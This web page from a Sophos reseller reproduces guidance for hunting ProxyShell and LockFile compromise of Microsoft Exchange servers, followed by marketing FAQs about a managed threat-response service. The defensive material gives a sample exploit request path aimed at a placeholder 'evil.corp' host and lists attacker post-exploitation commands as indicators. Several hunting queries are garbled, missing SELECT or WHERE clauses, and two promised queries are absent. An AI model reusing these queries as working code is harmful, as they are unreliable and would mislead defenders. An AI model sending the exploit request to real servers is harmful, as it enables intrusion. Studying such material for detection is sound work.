CVE-2021-34473 2305889, 2305807, 2305979 2305807 57906, 57907, 57908, 57909

In addition, on August 24th, SophosLabs released a new, more generic signature 2305979 to detect attempted vulnerability exploit in Microsoft Exchange server.

LockFile is a new ransomware family that appears to exploit the ProxyShell vulnerabilities to breach targets with unpatched, on premises Microsoft Exchange servers. SophosLabs has released additional behavior-based protection for LockFile provided by the Mem/LockFile-A detection for Windows devices running Sophos endpoint and server protection managed through Sophos Central.

Determining impact with Sophos XDR

1. Investigate exposure

Verifying current Microsoft Exchange version

To determine whether you are running an unpatched version of Exchange or not, the below XDR query for live Windows devices will produce a table of Exchange servers, their current version, and guidance whether they need patching or not.

The version numbers identified in the below query were gathered from this Microsoft article.

'Check Exchange Version to confirm Patch. Manually verify build number from MS documentation./' Note,
CASE product_version
WHEN '15.2.922.13' THEN 'Exchange 2019 CU10 Jul21 patched against ProxyShell'
WHEN '15.2.922.7' THEN 'Exchange 2019 CU10 patched against ProxyShell. Recommend also updating with recent July Patch.'
WHEN '15.2.858.15' THEN 'Exchange 2019 CU9 Jul21 patched against ProxyShell'
WHEN '15.2.858.12' THEN 'Exchange 2019 CU9 May21 patched against ProxyShell. Recommend also updating with recent July Patch.'
WHEN '15.1.2308.14' THEN 'Exchange 2016 CU21 Jul21 patched against ProxyShell'
WHEN '15.1.2308.8' THEN 'Exchange 2016 CU21 patched against ProxyShell. Recommend also updating with recent July Patch.'
WHEN '15.1.2242.12' THEN 'Exchange 2016 CU21 Jul21 patched against ProxyShell.'
WHEN '15.1.2242.10' THEN 'Exchange 2016 CU20 May21 patched against ProxyShell. Recommend also updating with recent July Patch.'
WHEN '15.1.2176.14' THEN 'Exchange 2016 CU19 May21 patched against ProxyShell. Recommend also updating with recent July Patch.'
WHEN '15.0.1497.23' THEN 'Exchange 2013 CU23 Jul21 patched against ProxyShell.'
WHEN '15.0.1497.18' THEN 'Exchange 2013 CU23 May21 patched against ProxyShell. Recommend also updating with recent July Patch.'
END Result,
'Product_Version: ' || Product_version Evidence
FROM file
WHERE path =
SELECT data FROM registry
WHERE key = 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ExchangeServer\v15\Setup' AND path = 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ExchangeServer\v15\Setup\MsiInstallPath'

Analyze IIS logs for autodiscover.json abuse

As these vulnerabilities lie in the Exchange Client Access Service (CAS) which runs over IIS (web server), reviewing the IIS logs will reveal attempted and successful exploitation of the ProxyShell vulnerabilities. HTTP requests inbound to the IIS server will be detailed including the request type and path.

By default, IIS logs are written to C:\inetpub\logs\LogFiles\

A common artifact seen in these logs for abuse of CVE-2021-34473 is the presence of &Email=autodiscover/autodiscover.json in the request path to confuse the Exchange proxy to erroneously strip the wrong part from the URL.

E.g. GET /autodiscover/autodiscover.json @evilcorp/ews/exchange.asmx?&Email=autodiscover/autodiscover.json%3F@evil.corp

The below XDR query for live Windows devices will query the IIS logs on disk for any lines that contain the string ‘autodiscover.json’.

Should you later identify web shells, this same query can be repurposed to query for the web shell file name to reveal requests made to the web shell – simply change ‘autodiscover.json’ to ‘webshell_name.aspx’. Please note that this query can be slow depending on the volume of logs it needs to parse.

SELECT grep.*
FROM file
CROSS JOIN grep ON (grep.path = file.path)
file.path LIKE 'C:\inetpub\logs\LogFiles\W3SVC%\u_ex210[89]%'
AND grep.pattern = 'autodiscover.json'

Windows Events for New-MailboxExportRequest abuse

CVE-2021-31207 enables a threat actor to write files to disk by abusing a feature of the Exchange PowerShell backend, specifically the New-MailboxExportRequest cmdlet. This cmdlet enables an email to be written to disk, using a UNC path, that contains an arbitrary email attachment. This has been the primary method used to deliver a web shell to a compromised device.

Windows Event logs for MSExchange Management typically log usage of New-MailboxExportRequest. By reviewing these logs, the locations of web shells can be ascertained.

The below XDR query for live Windows devices will query the Windows Event logs from the past 14 days for any events that detail usage of this cmdlet and the parameters of the command (including file path).

FROM sophos_windows_events
WHERE source = 'MSExchange Management'
AND time > strftime('%s', 'now', '-14 days')
AND data LIKE '%MailboxExportRequest%'

2. Identify suspicious web shells and binaries

Adversaries exploiting these vulnerabilities are dropping web shells on to the compromised device through which they can issue additional commands such as downloading and executing malicious binaries (such as .exe or .dll files).

As these vulnerabilities lie in CAS which runs on IIS, adversarial activity will stem from a w3wp.exe process, a worker process for IIS.

Web shells on disk

The below XDR query for live Windows devices looks at directories where adversaries are dropping web shells which may still be present on disk. Review any unexpected or recently created .aspx files that are present in the output of the query.
E.g.  C:\inetpub\wwwroot\aspnet_client\654253568.aspx

file sf
LEFT JOIN hash sh
ON sf.path = sh.path
sf.path LIKE 'C:\inetpub\wwwroot\aspnet_client\system_web\%.aspx'
OR sf.path LIKE 'C:\inetpub\wwwroot\aspnet_client\%.aspx'
OR sf.path LIKE 'C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\%.aspx'
OR sf.path LIKE 'C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\ecp\auth\%.aspx'
OR sf.path LIKE 'C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\current\%.aspx'
OR sf.path LIKE 'C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\current\themes\%.aspx'
OR sf.path LIKE 'C:\ProgramData\%.aspx'
OR sf.path LIKE 'C:\ProgramData\%\%.aspx'

With the results, you can pivot from the path column of a suspected web shell by clicking the (…) button and selecting “File access history” to query and identify what processes have interacted with the file and which process created the file. Instances of w3wp.exe should be investigated to reveal further actions the adversary may have taken by pivoting from the sophosPID of the process, clicking the (…) button next to the sophosPID, and selecting the “Process activity history” query.

Historic web shell file creation events

Alternatively, to identify web shells that have been dropped but may have been deleted, you can interrogate the Sophos process and file journals to look at historic file creations for .aspx files in the last day by using the below XDR query for live Windows devices. To increase your hunt time range you can change ‘now’ and  ‘-1 days’ to values that needs to be investigated.

CAST(datetime(sfj.time, 'unixepoch') AS TEXT) date,
CASE sfj.eventType
WHEN 0 THEN 'Created'
END eventType,
replace(sfj.pathname, rtrim(sfj.pathname, replace(sfj.pathname, '\', '')), '') fileName,
spj.pathname processPath,
sfj.pathname filePath,
FROM sophos_file_journal sfj
LEFT JOIN sophos_process_journal spj
ON spj.sophosPID = sfj.sophosPID
AND spj.time = replace(sfj.sophosPID, rtrim(sfj.sophosPID, replace(sfj.sophosPID  , ':', '')), '')/10000000-11644473600
WHERE sfj.time > strftime('%s', 'now', '-1 days')
AND sfj.eventType IN (0)
AND sfj.pathname LIKE '%.aspx';

Similarly, the sophosPID of suspect processes, especially w3wp.exe, should be pivoted from and the process activity history reviewed to determine other actions the adversary may have taken.

Modified applicationHost.config physicalPaths

Threat actors have also been observed modifying the Exchange configuration, typically located at C:\Windows\System32\inetsrv\Config\applicationHost.config, to add new virtual directory paths to obfuscate the location of web shells. These paths are defined in the config under physicalPath parameter of a virtualDirectory definition. Any entries for web shells should be deleted and the IIS service restarted to reload the config.

The below XDR query for live Windows devices will list all physicalPath entries of the applicationHost.config file.

SELECT grep.*
FROM file
CROSS JOIN grep ON (grep.path = file.path)
file.path LIKE 'C:\Windows\System32\inetsrv\Config\applicationHost.config'
AND grep.pattern = 'physicalPath'

New and suspicious files in System32

Actors have commonly been dropping malicious executables, via a web shell, to the System32 directory. Recently created .exe files and other suspicious files at this path should be investigated.
E.g. C:\Windows\System32\createhidetask.exe
E.g. C:\Windows\System32\ApplicationUpdate.exe

The below XDR query for live Windows devices will list all the files currently in the System32 directory.


3. Investigate historical command executions

PowerShell and cmd child processes of w3wp

As detailed in the previous section, the presence and use of web shells will result in command executions and other suspicious activity stemming from an IIS Worker Process  w3wp.exe.

The below query for the XDR Data Lake will list details of hosts where powershell.exe or cmd.exe are child processes of w3wp.exe as well as detail the commands that have been executed.

query_name = 'running_processes_windows_sophos'
AND parent_name = 'w3wp.exe'
AND (name = 'powershell.exe'
OR name = 'cmd.exe')

Sophos MTR has observed threat actors executing the following commands during ProxyShell incidents which may aid you in identifying post-exploit activity.

  • whoami
  • Invoke-WebRequest
  • Start-Process
  • ping
  • mkdir
  • reg add
  • net user
  • net accounts
  • net localgroup
  • icacls
  • takeown
  • tasklist
  • schtasks

4. Locate other forms of persistence

Scheduled Tasks

Sophos has observed threat actors establishing persistence on compromised devices by creating scheduled tasks to periodically execute a suspicious binary. The below XDR query for live Windows devices can be used to list the current Scheduled Tasks on a device which should be reviewed, and any suspicious tasks investigated.


How Sophos Managed Threat Response (MTR) can help

Threats such as ProxyShell are a great example of the peace of mind you get knowing your organization is backed by an elite team of threat hunters and incident response experts.

When the ProxyShell news broke, the Sophos MTR team immediately began to hunt and investigate in customer environments to determine if any activity was related to the attack. Additionally, they looked to uncover any new artifacts (e.g. IOCs) related to the attack that could provide further protection for all Sophos customers.

The 24/7 nature of Sophos MTR meant that not a single second was wasted as we started hunting for evidence of abuse, ensuring our customers were protected.

Concerned about ProxyShell? Contact the team at Spear Shield to ensure that any potential adversarial activity in your environment is identified and neutralized, before any damage is done.


Change log

2021-08-24 UTC 08.00 Added Sophos detections
2021-08-24 UTC 08.41 Fixed error in Exchange version script
2021-08-24 UTC 13.05 Added details for hunting web shells in modified Exchange config
2021-08-24 UTC 13.54 Added link to Naked Security article on Web Shells
2021-08-24 UTC 15.36 Added details of new IPS signature
2021-08-25 UTC 07:55 Added information on additional behavioral-based protection for LockFile
2021-08-27 UTC 14.53 Aligned recommendations with guidance in our Sophos Community post
2021-08-31 UTC 17.12 Added data lake query for historic command executions semming from w3wp.exe
2021-08-31 UTC 21.29 Restructured Sophos XDR guidance and added queries for searching IIS logs for autodiscover.json abuse, and Windows Events for New-MailboxExportRequest abuse
2021-09-07 UTC 14.54 Added additional file path to Web Shells On Disk query
2021-09-23 UTC 11.26 Updated “
Analyze IIS logs…” query to search over both Aug and Sept


The Capabilities of a Modern SOC Delivered as a Fully-Managed Service.

“The Spear Shield team were very efficient helping us enhance our endpoint security.”

Sophos MTR reporting mapped to MITRE ATTACK framework

Exec-level ready reporting mapped to the MITRE ATT&CK Framework 

Provide assurance to your organisation with weekly and monthly activity reporting. Exec-level ready reporting mapped to the MITRE ATT&CK Framework to help you answer those difficult questions internally.


Why customers choose Sophos with Spear Shield.

The team at Spear Shield have over 15+ combined year's experience working with (and for!) Sophos.


In-House Professional Services

Spear Shield customers can take comfort of the in-house Sophos Architect and Engineer in-house technical expertise and resource available to support them. 

Access to the best commercials available

The team at Spear Shield has access to the most competitive commercials available and can provide our customers with both term-based and MSP licensing options to accomodate all budget types.

Pre & Post Sales Support

Our job isn't to sell to you... It's to help you sell to the rest of your business. Spear Shield can provide full business case assistance with proposals and cyber risk quantification to support you both pre and post-sales too.

Our most popular Services...



Everything you need to know about Spear Shield's Managed Threat Hunting and Incident Response Service.

What licensing options can Spear Shield provide?

Spear Shield can offer both Term-licensing and MSP options to our customers to be able to align and suit your preferred budget type and working style. Please speak with the team for details.

Can Spear Shield supply Public Sector Organisations through a Framework?

Yes! Spear Shield has routes to market to be able to supply public sector organisations incl G-Cloud. Please speak with the team for details.

Can Spear Shield work with Large Enterprise?

Yes! and we do. Our Team has many, many combined years experience working with some of the largest private sector enterprises across the country to help tackle and solve cyber risk. All of Spear Shield's cybersecurity solutions and services are scalable and enterprise-grade.

Does Spear Shield offer Not-For-Profit Discount?

Yes, the Spear Shield Team will always ensure any eligible not-for-profit and public sector discounts are applied to any quotes.

Why Spear Shield for Managed Detection Response Services?

Other managed detection and response (MDR) services simply notify you of attacks or suspicious events. Then it's up to you to manage things from there.

With the Managed Threat Hunting and Incident Response (MTR) Service provided by Spear Shield, your organisation is backed by an elite team of threat hunters and response experts who take targeted actions on your behalf to neutralise even the most sophisticated threats.

What are some of the top cybersecurity threats for 2022?

Here are some of the top cybersecurity threats organisations are facing in 2022. 

Social Engineering
Any network is hackable if an employee can be duped into sharing access.

Third-Party Exposure
Vendors, clients, and app integrations with poor security can provide access to an otherwise well-protected network.

Configuration Mistakes
Your cybersecurity investments are only as strong as they are configured correctly.

Human Activated Risk
User education and visibility for IT is essential to ensure those with network access and those handling sensitive data are maintaining cyber best practices.

Hackers are targeting back-ups and using extortion more and more to push receiving the ransom payment from their victims.

Mobile Devices
Every mobile device is a gateway to your network and sensitive business data.

Lack of resource and expertise
Human-led cyber attacks require human-led threat hunting. Unfortunately, skilled threat hunters are few and far between. 

Internet of Things (IoT)
Smart technology users may not realise that any IoT device can be hacked to obtain network access. Securing your network starts with understanding what's on it.

What are the different types of Threat Hunting?

Threat hunting” is one of the latest cybersecurity terms to earn platinum-level buzzword status alongside “AI,” “machine learning,” and countless others. Everybody is talking about it, few actually do it, and many don’t understand what it really means (and at this point are too afraid to ask). So, let’s start with our definition of threat hunting.

Threat Hunting
A human-led investigation of causal and adjacent events (weak signals) to discover new Indicators of Attack (IoA) and Indicators of Compromise (IoC) that cannot be detected or stopped by existing tools.

To put it another way, a threat hunt is when an analyst conducts an investigation to detect attacks that tools don’t issue an alert about and which only a human can find. And while threat hunting is often described in absolute terms, there are actually three different categories of threat hunts: automated, lead-driven, and lead-less.

Automated: This type of threat hunt uses automation and/or machine learning to surface potentially malicious activity that may require further investigation by human analysts. While this is what many service providers are referencing when they say they do “managed threat hunting,” this is what is programmatically handled by Intercept X Advanced with EDR.

Lead-driven: This type of threat hunt involves a manual (human-led) identification and investigation of events and activities (leads) that do not generate an alert but could be indicative of new attacker behavior. The MTR Ops team performs lead-driven hunts for all Standard and Advanced tier MTR customers.

Lead-less: This type of threat hunt combines threat intelligence, data science, and knowledge of attacker behavior with what’s known about the customer’s environment (e.g. company profile, high-value assets, high risk users, etc.) to anticipate new attacker behaviors and validate detection and response capabilities. This category is sometimes called “methodology hunting,” and very few service providers have the ability to perform this kind of threat hunt. The MTR Ops team performs lead-less hunts for all Advanced tier MTR customers.

Why choose Spear Shield to procure Sophos?

Spear Shield have a combined 15+ years working with and for Sophos.

The team at Spear Shield has a fantastic working relationship with Sophos to ensure we can provide our customers with the latest news about their solutions.

Spear Shield also has the in-house technical expertise to be able to provide our Sophos customers with Professional Services for implementation, health checks and VIP access to 3rd line engineers.

Spear Shield also use Sophos solutions internally to protect our own network, so customers can be assured that we practice what we preach.

Does Spear Shield perform the Threat Hunting as part of the MTR Service?

No, we don't. We leave that to our Threat Response friends over at Sophos.

Spear Shield are a Sophos Partner who provides our customers with the Sophos MTR Service.

Spear Shield can provide a tailored managed service wrapper however or certified Sophos training with our in-house Sophos professional services.

How many customers use the Sophos MTR Service?

The Sophos MTR, 24/7 human-led threat hunting, detection, and response service, now supports over 10,000 organisations around the world.

How does the MTR Service align to the MITRE ATT&CK Framework?

MTR detections are mapped to specific techniques in the MITRE ATT&CK framework, a widely used knowledge base of adversary behaviours based on real-world observations. You will see the breakdown of detections, by percentage, in this section of the monthly report.

As with all detections, these are not necessarily malicious and benign behaviour may align to adversarial tactics and techniques. It is also important to note that the total number of MTR Cases may not be equal to the total number of adversarial tactics observed. Multiple adversarial tactics can be observed in one MTR Case, resulting in the number of tactics being greater than the total number of MTR cases. Conversely, MTR Cases may be created that are not associated with adversarial (health check cases, for example), resulting in the total number of MTR Cases being greater than the total number of adversarial tactics.